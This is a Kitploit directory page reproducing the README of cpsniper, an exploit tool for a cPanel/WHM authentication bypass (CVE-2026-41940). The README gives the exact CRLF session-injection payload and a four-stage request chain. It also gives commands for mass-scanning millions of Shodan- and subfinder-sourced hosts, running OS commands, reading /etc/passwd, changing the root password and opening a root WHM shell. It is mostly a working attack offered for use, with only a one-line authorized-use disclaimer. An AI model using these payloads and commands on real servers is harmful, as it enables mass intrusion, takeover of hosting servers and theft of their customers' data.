Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cpsniper — cPanelSniper 稳定版 - CVE-2026-41940 针对 1000 万+ 目标优化 | Kitploit
工具/GitHubGitHub/44pie/cpsniper
身份验证与授权漏洞扫描器漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队
GitHub44pie/cpsniper

cpsniper

cPanelSniper 稳定版 - CVE-2026-41940 针对 1000 万+ 目标优化

查看仓库
2214个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cPanelSniper

cPanelSniper

Python CVE cPanel stdlib pipeline Author

CVE-2026-41940 — cPanel 与 WHM 通过会话文件 CRLF 注入实现认证绕过
4 阶段利用链 · 交互式 WHM Shell · 对 1000 万+ 目标真正稳定 · 零内存占用 · 仅依赖标准库


概述

cPanelSniper 是一个针对 CVE-2026-41940 的专项利用框架,该漏洞是影响 cPanel 与 WHM 的严重认证绕过漏洞。该漏洞允许未认证的远程攻击者通过 Authorization HTTP 头向会话文件注入 CRLF 序列,从而获得 root 级别的 WHM 访问权限——无需任何有效凭据。

  • CVSS 评分: 10.0(严重)
  • 野外利用情况: 已确认(2026 年 4 月)
  • 受影响安装量: 约 7000 万个运行 cPanel 与 WHM 的域名
  • 零依赖: 纯 Python 标准库——无需 pip、无需 requests、无需外部包

仅限授权渗透测试和漏洞赏金项目使用。


⚡ 真正稳定版本

此版本针对扫描 10,000,000+ 目标进行了优化,且零内存占用。

修复内容

问题原始版本修复版本
内存占用将所有目标加载到内存逐行流式处理目标(0 内存)
1000 万目标内存耗尽 → 被终止 ❌顺利完成 ✅
断点续扫不支持--resume 标志
进度显示无预计完成时间实时预计完成时间 + 速率 + 统计
结果保存仅在结束时保存每 60 秒保存(可配置)

主要特性

  • 流式架构 - 无需加载到内存即可处理 1000 万+ 目标
  • 零内存耗尽崩溃 - 即使目标列表非常庞大也不会崩溃
  • 自动断点续扫 - 使用 --resume 从上次中断处继续
  • 实时进度 - 预计完成时间、扫描速率、错误跟踪
  • 定期保存 - 结果自动保存以防止数据丢失
  • 管道就绪 - 与 subfinder、httpx、shodan 无缝配合

工作原理

根本原因位于 Session.pm 中:saveSession() 函数在将会话文件写入磁盘之后才调用 filter_sessiondata()。这意味着嵌入在 Authorization: Basic 头值中的 CRLF 字符会被原样写入会话文件,在净化处理之前注入攻击者控制的字段。

正常流程:
  POST /login/ → filter_sessiondata() → 写入会话 → 认证检查

漏洞流程:
  POST /login/ → 写入会话(注入 CRLF 载荷)→ filter_sessiondata() → 认证检查读取被污染的文件

CRLF 载荷

Authorization: Basic 值解码后为:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

这些字段被直接写入磁盘上的会话文件。当读回时,cPanel 将会话视为完全认证的 root 会话。

4 阶段利用链

┌─────────────────────────────────────────────────────────────┐
│  阶段 0 — 规范主机名发现                                     │
│  GET /openid_connect/cpanelid → 307 → 真实主机名            │
├─────────────────────────────────────────────────────────────┤
│  阶段 1 — 铸造预认证会话                                     │
│  POST /login/?login_only=1  (错误凭据)                     │
│  ← 401 + whostmgrsession cookie                             │
├─────────────────────────────────────────────────────────────┤
│  阶段 2 — CRLF 注入                                          │
│  GET / + Cookie: session + Authorization: Basic <载荷>      │
│  cpsrvd 将 CRLF 字段写入会话文件                             │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                     │
├─────────────────────────────────────────────────────────────┤
│  阶段 3 — 传播(do_token_denied 小工具)                     │
│  GET /scripts2/listaccts                                    │
│  触发 raw→cache 刷新 — 注入字段变为生效状态                  │
│  ← 401 Token denied(预期行为)                              │
├─────────────────────────────────────────────────────────────┤
│  阶段 4 — 验证 WHM root 访问权限                             │
│  GET /cpsessXXXXXXXXXX/json-api/version                     │
│  ← 200 {"version":"11.x.x.x","result":1}  = 已被攻破        │
└─────────────────────────────────────────────────────────────┘

受影响版本

分支受影响版本已修复版本
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

安装

git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help

无需 pip 安装。仅需纯 Python 3.8+ 标准库。


使用方法

基本扫描

# 单目标 — 仅扫描
python3 cPanelSniper.py -u https://target.com:2087

# 单目标 — 绕过后进入交互式 shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# 大型目标列表 — 1000 万+ 目标(真正稳定)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# 断点续扫被中断的扫描
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

利用后操作

# 列出服务器上的所有 cPanel 账户
python3 cPanelSniper.py -u https://target.com:2087 --action list

# 执行操作系统命令
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# 获取服务器信息(主机名、负载、磁盘、MySQL 主机)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# 获取 cPanel 版本
python3 cPanelSniper.py -u https://target.com:2087 --action version

# 修改 root 密码
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# 交互式 WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell

管道使用(大型列表真正稳定)

# subfinder → httpx → 保存到文件 → 扫描 1000 万+ 目标
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# 从范围列表 - 处理数百万个域名
cat scope.txt | \
  httpx -silent -ports 2087,2086 -threads 100 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

# Shodan 结果 - 大规模扫描
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' > targets.txt
python3 cPanelSniper.py -l targets.txt -t 30 -o shodan_results.json

# stdin 管道 - 仅适用于小型列表(<10 万)
echo "https://target.com:2087" | python3 cPanelSniper.py

# 多来源合并 → 大规模扫描
{ subfinder -d target.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 > all_targets.txt
python3 cPanelSniper.py -l all_targets.txt -t 50 -o results.json --resume

真正稳定的最佳实践

扫描 1000 万+ 目标时:

  1. 始终先保存到文件 - 大型列表不要直接使用管道

    # 良好 - 适用于 1000 万+ 目标
    httpx ... > targets.txt
    python3 cPanelSniper.py -l targets.txt -t 50 -o results.json
    
    # 不佳 - 大型列表会崩溃
    httpx ... | python3 cPanelSniper.py
    
  2. 使用适当的线程数

    • 10-20 线程:10 万目标
    • 30-50 线程:100 万-1000 万目标
    • 50-100 线程:1000 万+ 目标
  3. 长时间扫描启用自动断点续扫

    python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
    

    如果被中断,只需使用 --resume 再次运行

  4. 监控进度

    • 实时显示预计完成时间
    • 每 60 秒保存一次结果
    • Ctrl+C 保留所有发现

交互式 WHM Shell

成功绕过后,--action shell 标志会进入交互式提示符:

════════════════════════════════════════════════════════════
  WHM Shell — target.com
  版本: CVE-2026-41940 | 认证: CRLF 绕过
  输入 'help' 查看命令,'exit' 退出
════════════════════════════════════════════════════════════

[email protected] ▶ id
  uid=0(root) gid=0(root) groups=0(root)

[email protected] ▶ accounts
  [cPanel 账户]  target.com:2087 (47 个用户)
    user01               域名: example.com    邮箱: [email protected]
    user02               域名: shop.com       邮箱: [email protected]
    ...

[email protected] ▶ cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...

[email protected] ▶ info
  [服务器信息]  https://target.com:2087
  主机名: srv01.target.com
  负载: 0.72 / 0.66 / 0.69
  版本: 11.130.0.6
下载工具